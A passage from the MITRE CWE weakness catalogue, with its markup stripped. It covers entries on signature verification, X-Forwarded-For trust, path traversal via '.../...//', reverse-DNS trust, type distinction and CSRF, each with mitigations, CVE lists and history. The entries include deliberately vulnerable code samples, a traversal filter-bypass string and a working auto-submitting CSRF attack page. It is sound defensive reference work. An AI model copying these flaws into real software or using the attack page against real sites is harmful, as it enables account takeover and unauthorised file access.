spoofing. + https://www.cve.org/CVERecord?id=CVE-2005-2182 + + + CVE-2002-1706 + Accepts a configuration file without a Message Integrity Check (MIC) signature. + https://www.cve.org/CVERecord?id=CVE-2002-1706 + + + + + Improperly Verified Signature + + + SEC06-J + Do not rely on the default automatic signature verification provided by URLClassLoader and java.util.jar + + + Part 3-3 + Req SR 1.9 + + + Part 4-1 + Req SM-6 + + + Part 4-2 + Req EDR 3.12 + + + Part 4-2 + Req NDR 3.12 + + + Part 4-2 + Req HDR 3.12 + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Related_Attack_Patterns, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-04-25 + Suggested mappings to ISA/IEC 62443. + + Improperly Verified Signature + + + + The product has two different sources of the same data or information, but it uses the source that has less support for verification, is less trusted, or is less resistant to attack. + + + + + + + + + Architecture and Design + + + Implementation + + + + + Access Control + Bypass Protection Mechanism + Gain Privileges or Assume Identity + An attacker could utilize the untrusted data source to bypass protection mechanisms and gain access to sensitive data. + + + + + This code attempts to limit the access of a page to certain IP Addresses. It checks the 'HTTP_X_FORWARDED_FOR' header in case an authorized user is sending the request through a proxy. + + $requestingIP = '0.0.0.0';if (array_key_exists('HTTP_X_FORWARDED_FOR', $_SERVER)) {$requestingIP = $_SERVER['HTTP_X_FORWARDED_FOR']; + else{$requestingIP = $_SERVER['REMOTE_ADDR'];} + if(in_array($requestingIP,$ipAllowlist)){generatePage();return;}else{echo "You are not authorized to view this page";return;} + + The 'HTTP_X_FORWARDED_FOR' header can be user controlled and so should never be trusted. An attacker can falsify the header to gain access to the page. + This fixed code only trusts the 'REMOTE_ADDR' header and so avoids the issue: + + $requestingIP = '0.0.0.0';if (array_key_exists('HTTP_X_FORWARDED_FOR', $_SERVER)) {echo "This application cannot be accessed through a proxy.";return; + else{$requestingIP = $_SERVER['REMOTE_ADDR'];} + ... + + + + Be aware that 'REMOTE_ADDR' can still be spoofed. This may seem useless because the server will send the response to the fake address and not the attacker, but this may still be enough to conduct an attack. For example, if the generatePage() function in this code is resource intensive, an attacker could flood the server with fake requests using an authorized IP and consume significant resources. This could be a serious DoS attack even though the attacker would never see the page's sensitive content. + + + + + CVE-2001-0860 + Product uses IP address provided by a client, instead of obtaining it from the packet headers, allowing easier spoofing. + https://www.cve.org/CVERecord?id=CVE-2001-0860 + + + CVE-2004-1950 + Web product uses the IP address in the X-Forwarded-For HTTP header instead of a server variable that uses the connecting IP address, allowing filter bypass. + https://www.cve.org/CVERecord?id=CVE-2004-1950 + + + BID:15326 + Similar to CVE-2004-1950 + http://www.securityfocus.com/bid/15326/info + + + CVE-2001-0908 + Product logs IP address specified by the client instead of obtaining it from the packet headers, allowing information hiding. + https://www.cve.org/CVERecord?id=CVE-2001-0908 + + + CVE-2006-1126 + PHP application uses IP address from X-Forwarded-For HTTP header, instead of REMOTE_ADDR. + https://www.cve.org/CVERecord?id=CVE-2006-1126 + + + + + Use of Less Trusted Source + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product, when processing trusted data, accepts any untrusted data that is also included with the trusted data, treating the untrusted data as if it were trusted. + + + + + + + + + Implementation + + + + + Access Control + Integrity + Bypass Protection Mechanism + Modify Application Data + An attacker could package untrusted data with trusted data to bypass protection mechanisms to gain access to and possibly modify sensitive data. + + + + + CVE-2002-0018 + Does not verify that trusted entity is authoritative for all entities in its response. + https://www.cve.org/CVERecord?id=CVE-2002-0018 + + + CVE-2006-5462 + use of extra data in a signature allows certificate signature forging + https://www.cve.org/CVERecord?id=CVE-2006-5462 + + + + + Untrusted Data Appended with Trusted Data + + + ENV01-J + Place all security-sensitive code in a single JAR and sign and seal it + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Related_Attack_Patterns, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Modes_of_Introduction, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + Untrusted Data Appended with Trusted Data + + + + The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '.../...//' (doubled triple dot slash) sequences that can resolve to a location that is outside of that directory. + + This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. + The '.../...//' manipulation is useful for bypassing some path traversal protection schemes. If "../" is filtered in a sequential fashion, as done by some regular expression engines, then ".../...//" can collapse into the "../" unsafe value (CWE-182). Removing the first "../" yields "....//"; the second removal yields "../". Depending on the algorithm, the product could be susceptible to CWE-34 but not CWE-35, or vice versa. + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. + Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. + + High + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2005-2169 + chain: ".../...//" bypasses protection mechanism using regexp's that remove "../" resulting in collapse into an unsafe value "../" (CWE-182) and resultant path traversal. + https://www.cve.org/CVERecord?id=CVE-2005-2169 + + + CVE-2005-0202 + ".../....///" bypasses regexp's that remove "./" and "../" + https://www.cve.org/CVERecord?id=CVE-2005-0202 + + + + + '.../...//' + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2008-11-24 + updated Observed_Examples + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-03-15 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Doubled Triple Dot Slash - '.../...//' + + + + The product performs reverse DNS resolution on an IP address to obtain the hostname and make a security decision, but it does not properly ensure that the IP address is truly associated with the hostname. + + Since DNS names can be easily spoofed or misreported, and it may be difficult for the product to detect if a trusted DNS server has been compromised, DNS names do not constitute a valid authentication mechanism. + When the product performs a reverse DNS resolution for an IP address, if an attacker controls the DNS server for that IP address, then the attacker can cause the server to return an arbitrary hostname. As a result, the attacker may be able to bypass authentication, cause the wrong hostname to be recorded in log files to hide activities, or perform other attacks. + Attackers can spoof DNS names by either (1) compromising a DNS server and modifying its records (sometimes called DNS cache poisoning), or (2) having legitimate control over a DNS server associated with their IP address. + + + + + + + + + + + + Architecture and Design + + + + + Access Control + Gain Privileges or Assume Identity + Bypass Protection Mechanism + Malicious users can fake authentication information by providing false DNS information. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Use other means of identity verification that cannot be simply spoofed. Possibilities include a username/password or certificate. + + + Implementation + Perform proper forward and reverse DNS lookups to detect DNS spoofing. + + + + + The following code samples use a DNS lookup in order to decide whether or not an inbound request is from a trusted host. If an attacker can poison the DNS cache, they can gain trusted status. + + struct hostent *hp;struct in_addr myaddr;char* tHost = "trustme.example.com";myaddr.s_addr=inet_addr(ip_addr_string); + hp = gethostbyaddr((char *) &myaddr, sizeof(struct in_addr), AF_INET);if (hp && !strncmp(hp->h_name, tHost, sizeof(tHost))) {trusted = true;} else {trusted = false;} + + + String ip = request.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);if (addr.getCanonicalHostName().endsWith("trustme.com")) {trusted = true;} + + + IPAddress hostIPAddress = IPAddress.Parse(RemoteIpAddress);IPHostEntry hostInfo = Dns.GetHostByAddress(hostIPAddress);if (hostInfo.HostName.EndsWith("trustme.com")) {trusted = true;} + + IP addresses are more reliable than DNS names, but they can also be spoofed. Attackers can easily forge the source IP address of the packets they send, but response packets will return to the forged IP address. To see the response packets, the attacker has to sniff the traffic between the victim machine and the forged IP address. In order to accomplish the required sniffing, attackers typically attempt to locate themselves on the same subnet as the victim machine. Attackers may be able to circumvent this requirement by using source routing, but source routing is disabled across much of the Internet today. In summary, IP address verification can be a useful part of an authentication scheme, but it should not be the single factor required for authentication. + + + In these examples, a connection is established if a request is made by a trusted host. + + sd = socket(AF_INET, SOCK_DGRAM, 0);serv.sin_family = AF_INET;serv.sin_addr.s_addr = htonl(INADDR_ANY);servr.sin_port = htons(1008);bind(sd, (struct sockaddr *) & serv, sizeof(serv));while (1) { + + memset(msg, 0x0, MAX_MSG);clilen = sizeof(cli);h=gethostbyname(inet_ntoa(cliAddr.sin_addr));if (h->h_name==...) n = recvfrom(sd, msg, MAX_MSG, 0, (struct sockaddr *) & cli, &clilen); + } + + + while(true) { + DatagramPacket rp=new DatagramPacket(rData,rData.length);outSock.receive(rp);String in = new String(p.getData(),0, rp.getLength());InetAddress IPAddress = rp.getAddress();int port = rp.getPort();if ((rp.getHostName()==...) & (in==...)) { + + out = secret.getBytes();DatagramPacket sp =new DatagramPacket(out,out.length, IPAddress, port);outSock.send(sp); + } + } + + These examples check if a request is from a trusted host before responding to a request, but the code only verifies the hostname as stored in the request packet. An attacker can spoof the hostname, thus impersonating a trusted client. + + + + + CVE-2001-1488 + Does not do double-reverse lookup to prevent DNS spoofing. + https://www.cve.org/CVERecord?id=CVE-2001-1488 + + + CVE-2001-1500 + Does not verify reverse-resolved hostnames in DNS. + https://www.cve.org/CVERecord?id=CVE-2001-1500 + + + CVE-2000-1221 + Authentication bypass using spoofed reverse-resolved DNS hostnames. + https://www.cve.org/CVERecord?id=CVE-2000-1221 + + + CVE-2002-0804 + Authentication bypass using spoofed reverse-resolved DNS hostnames. + https://www.cve.org/CVERecord?id=CVE-2002-0804 + + + CVE-2001-1155 + Filter does not properly check the result of a reverse DNS lookup, which could allow remote attackers to bypass intended access restrictions via DNS spoofing. + https://www.cve.org/CVERecord?id=CVE-2001-1155 + + + CVE-2004-0892 + Reverse DNS lookup used to spoof trusted content in intermediary. + https://www.cve.org/CVERecord?id=CVE-2004-0892 + + + CVE-2003-0981 + Product records the reverse DNS name of a visitor in the logs, allowing spoofing and resultant XSS. + https://www.cve.org/CVERecord?id=CVE-2003-0981 + + + + + Improperly Trusted Reverse DNS + + + Trusting self-reported DNS name + + + SFP29 + Faulty endpoint authentication + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + CWE-350, CWE-247, and CWE-292 were merged into CWE-350 in CWE 2.5. CWE-247 was originally derived from Seven Pernicious Kingdoms, CWE-350 from PLOVER, and CWE-292 from CLASP. All taxonomies focused closely on the use of reverse DNS for authentication of incoming requests. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Relationships + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2013-06-23 + Critical + CWE-247 and CWE-292 deprecated and merged into CWE-350 to address duplicates. + + + CWE Content Team + MITRE + 2013-07-17 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Name, Potential_Mitigations, References, Relationships, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2014-02-18 + updated Description, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Improperly Trusted Reverse DNS + + + + The product does not properly distinguish between different types of elements in a way that leads to insecure behavior. + + + + + + + + + + Implementation + + + + + Other + Other + + + + + CVE-2005-2260 + Browser user interface does not distinguish between user-initiated and synthetic events. + https://www.cve.org/CVERecord?id=CVE-2005-2260 + + + CVE-2005-2801 + Product does not compare all required data in two separate elements, causing it to think they are the same, leading to loss of ACLs. Similar to Same Name error. + https://www.cve.org/CVERecord?id=CVE-2005-2801 + + + + + Insufficient Type Distinction + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Overlaps others, e.g. Multiple Interpretation Errors. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. + When a web server is designed to receive a request from a client without any mechanism for verifying that it was intentionally sent, then it might be possible for an attacker to trick a client into making an unintentional request to the web server which will be treated as an authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and can result in exposure of data or unintended code execution. + + + + + + + + + + + + + + + Session Riding + + + Cross Site Reference Forgery + + + XSRF + + + + + Architecture and Design + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Medium + + + Confidentiality + Integrity + Availability + Non-Repudiation + Access Control + Gain Privileges or Assume Identity + Bypass Protection Mechanism + Read Application Data + Modify Application Data + DoS: Crash, Exit, or Restart + The consequences will vary depending on the nature of the functionality that is vulnerable to CSRF. An attacker could effectively perform any operations as the victim. If the victim is an administrator or privileged user, the consequences may include obtaining complete control over the web application - deleting or stealing data, uninstalling the product, or using it to launch other attacks against all of the product's users. Because the attacker has the identity of the victim, the scope of CSRF is limited only by the victim's privileges. + + + + + Manual Analysis + + This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. + Specifically, manual analysis can be useful for finding this weakness, and for minimizing false positives assuming an understanding of business logic. However, it might not achieve desired code coverage within limited time constraints. For black-box analysis, if credentials are not known for privileged accounts, then the most security-critical portions of the application may not receive sufficient attention. + Consider using OWASP CSRFTester to identify potential issues and aid in manual analysis. + + High + These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. + + + Automated Static Analysis + CSRF is currently difficult to detect reliably using automated techniques. This is because each application has its own implicit security policy that dictates which requests can be influenced by an outsider and automatically performed on behalf of a user, versus which requests require strong confidence that the user intends to make the request. For example, a keyword search of the public portion of a web site is typically expected to be encoded within a link that can be launched automatically when the user clicks on the link. + Limited + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + Binary Weakness Analysis - including disassembler + source code weakness analysis + + + + SOAR Partial + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Web Application Scanner + + + + High + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Fuzz Tester + Framework-based Fuzzer + + + + High + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Focused Manual Spotcheck - Focused manual analysis of source + Manual Source Code Review (not inspections) + + + + SOAR Partial + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + Formal Methods / Correct-By-Construction + + + + SOAR Partial + + + + + Architecture and Design + Libraries or Frameworks + + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + For example, use anti-CSRF packages such as the OWASP CSRFGuard. [REF-330] + Another example is the ESAPI Session Management control, which includes a component for CSRF. [REF-45] + + + + Implementation + Ensure that the application is free of cross-site scripting issues (CWE-79), because most CSRF defenses can be bypassed using attacker-controlled script. + + + Architecture and Design + Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330). [REF-332] + Note that this can be bypassed using XSS (CWE-79). + + + Architecture and Design + Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation. + Note that this can be bypassed using XSS (CWE-79). + + + Architecture and Design + + Use the "double-submitted cookie" method as described by Felten and Zeller: + When a user visits a site, the site should generate a pseudorandom value and set it as a cookie on the user's machine. The site should require every form submission to include this value as a form value and also as a cookie value. When a POST request is sent to the site, the request should only be considered valid if the form value and the cookie value are the same. + Because of the same-origin policy, an attacker cannot read or modify the value stored in the cookie. To successfully submit a form on behalf of the user, the attacker would have to correctly guess the pseudorandom value. If the pseudorandom value is cryptographically strong, this will be prohibitively difficult. + This technique requires Javascript, so it may not work for browsers that have Javascript disabled. [REF-331] + + Note that this can probably be bypassed using XSS (CWE-79), or when using web technologies that enable the attacker to read raw headers from HTTP requests. + + + Architecture and Design + Do not use the GET method for any request that triggers a state change. + + + Implementation + Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons. + Note that this can be bypassed using XSS (CWE-79). An attacker could use XSS to generate a spoofed Referer, or to generate a malicious request from a page whose Referer would be allowed. + + + + + This example PHP code attempts to secure the form submission process by validating that the user submitting the form has a valid session. A CSRF attack would not be prevented by this countermeasure because the attacker forges a request through the user's web browser in which a valid session already exists. + The following HTML is intended to allow a user to update a profile. + + <form action="/url/profile.php" method="post"><input type="text" name="firstname"/><input type="text" name="lastname"/><br/><input type="text" name="email"/><input type="submit" name="submit" value="Update"/></form> + + profile.php contains the following code. + + // initiate the session in order to validate sessions + session_start(); + + //if the session is registered to a valid user then allow update + + if (! session_is_registered("username")) { + + echo "invalid session detected!"; + + // Redirect user to login page + [...] + exit; + } + + // The user session is valid, so process the request + + + // and update the information + + update_profile(); + function update_profile { + + + // read in the data from $POST and send an update + + + // to the database + SendUpdateToDatabase($_SESSION['username'], $_POST['email']);[...]echo "Your profile has been successfully updated."; + } + + This code may look protected since it checks for a valid session. However, CSRF attacks can be staged from virtually any tag or HTML construct, including image tags, links, embed or object tags, or other attributes that load background images. + The attacker can then host code that will silently change the username and email address of any user that visits the page while remaining logged in to the target web application. The code might be an innocent-looking web page such as: + + <SCRIPT>function SendAttack () {form.email = "attacker@example.com"; + // send to profile.php + form.submit();}</SCRIPT> + <BODY onload="javascript:SendAttack();"> + <form action="http://victim.example.com/profile.php" id="form" method="post"><input type="hidden" name="firstname" value="Funny"><input type="hidden" name="lastname" value="Joke"><br/><input type="hidden" name="email"></form> + + Notice how the form contains hidden fields, so when it is loaded into the browser, the user will not notice it. Because SendAttack() is defined in the body's onload attribute, it will be automatically called when the victim loads the web page. + Assuming that the user is already logged in to victim.example.com, profile.php will see that a valid user session has been established, then update the email address to the attacker's own address. At this stage, the user's identity has been compromised, and messages sent through this profile could be sent to the attacker's address. + + + + + CVE-2004-1703 + Add user accounts via a URL in an img tag + https://www.cve.org/CVERecord?id=CVE-2004-1703 + + + CVE-2004-1995 + Add user accounts via a URL in an img tag + https://www.cve.org/CVERecord?id=CVE-2004-1995 + + + CVE-2004-1967 + Arbitrary code execution by specifying the code in a crafted img tag or URL + https://www.cve.org/CVERecord?id=CVE-2004-1967 + + + CVE-2004-1842 + Gain administrative privileges via a URL in an img tag + https://www.cve.org/CVERecord?id=CVE-2004-1842 + + + CVE-2005-1947 + Delete a victim's information via a URL or an img tag + https://www.cve.org/CVERecord?id=CVE-2005-1947 + + + CVE-2005-2059 + Change another user's settings via a URL or an img tag + https://www.cve.org/CVERecord?id=CVE-2005-2059 + + + CVE-2005-1674 + Perform actions as administrator via a URL or an img tag + https://www.cve.org/CVERecord?id=CVE-2005-1674 + + + CVE-2009-3520 + modify password for the administrator + https://www.cve.org/CVERecord?id=CVE-2009-3520 + + + CVE-2009-3022 + CMS allows modification of configuration via CSRF attack against the administrator + https://www.cve.org/CVERecord?id=CVE-2009-3022 + + + CVE-2009-3759 + web interface allows password changes or stopping a virtual machine via CSRF + https://www.cve.org/CVERecord?id=CVE-2009-3759 + + + + + Cross-Site Request Forgery (CSRF) + + + A5 + Cross Site Request Forgery (CSRF) + Exact + + + 9 + Cross-site Request Forgery + + + + + + + + + + + + + + + + + + + + + + Allowed + This is a well-known Composite of multiple weaknesses that must all occur simultaneously, although it is attack-oriented in nature. + While attack-oriented composites are supported in CWE, they have not been a focus of research. There is a chance that future research or CWE scope clarifications will change or deprecate them. Perform root-cause analysis to determine if other weaknesses allow CSRF attacks to occur, and map to those weaknesses. For example, predictable CSRF tokens might allow bypass of CSRF protection mechanisms; if this occurs, they might be better characterized as randomness/predictability weaknesses. + + + + + + + There can be a close relationship between XSS and CSRF (CWE-352). An attacker might use CSRF in order to trick the victim into submitting requests to the server in which the requests contain an XSS payload. A well-known example of this was the Samy worm on MySpace [REF-956]. The worm used XSS to insert malicious HTML sequences into a user's profile and add the attacker as a MySpace friend. MySpace friends of that victim would then execute the payload to modify their own profiles, causing the worm to propagate exponentially. Since the victims did not intentionally insert the malicious script themselves, CSRF was a root cause. + + + The CSRF topology is multi-channel: + + Attacker (as outsider) to intermediary (as user). The interaction point is either an external or internal channel. + Intermediary (as user) to server (as victim). The activation point is an internal channel. + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Alternate_Terms, Description, Relationships, Other_Notes, Relationship_Notes, 